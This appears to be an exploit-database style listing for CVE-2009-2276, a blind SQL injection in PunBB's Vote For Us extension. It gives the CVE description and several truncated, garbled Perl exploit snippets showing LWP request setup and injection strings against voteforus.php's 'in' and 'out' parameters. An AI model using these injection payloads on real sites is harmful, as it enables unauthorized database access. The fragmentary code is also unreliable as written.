PunBB Extension Vote For Us <= 1.0.1 - Blind SQL Injection Exploit

No description provided by source. !/usr/bin/perl 0-Day PunBB VoteForUs.php OUT Mod = v1.0.1 Remote Blind SQL Injection Exploit Coded By Dante90, WaRWolFz Crew Bug Discovered By: Dante90, WaRWolFz Crew Download: http://www.punres.org/desc.php?pid=378 use strict; use LWP::UserAgent; use...

Sql injection

SQL injection vulnerability in voteforus.php in the Vote For Us extension 1.0.1 and earlier for PunBB allows remote attackers to execute arbitrary SQL commands via the out parameter...

CVE-2009-2276

The CVE-2009-2276 entry describes a SQL injection vulnerability in the Vote For Us extension for PunBB (v1.0.1 and earlier). The flaw resides in voteforus.php, allowing remote attackers to inject SQL commands via the out parameter. Affected software: PunBB with the Vote For Us extension (versions

PunBB VoteForUs.php Blind SQL Injection

!/usr/bin/perl 0-Day PunBB VoteForUs.php IN Mod newGET = $Host; my $HTTP = new LWP::UserAgent; my $Referrer = "http://warwolfz.altervista.org/"; my $DefaultTime = request$Referrer; sub BlindSQLJnjection my $dec,$hex = @; return "./voteforus.php?in=-1+OR+1!=SELECT...

PunBB VoteForUs.php OUT 1.0.1 Blind SQL Injection

!/usr/bin/perl 0-Day PunBB VoteForUs.php OUT Mod newGET = $Host; my $HTTP = new LWP::UserAgent; my $Referrer = "http://warwolfz.altervista.org/"; my $DefaultTime = request$Referrer; sub BlindSQLJnjection my $dec,$hex = @; return "./voteforus.php?out=-1+OR+1!=SELECT...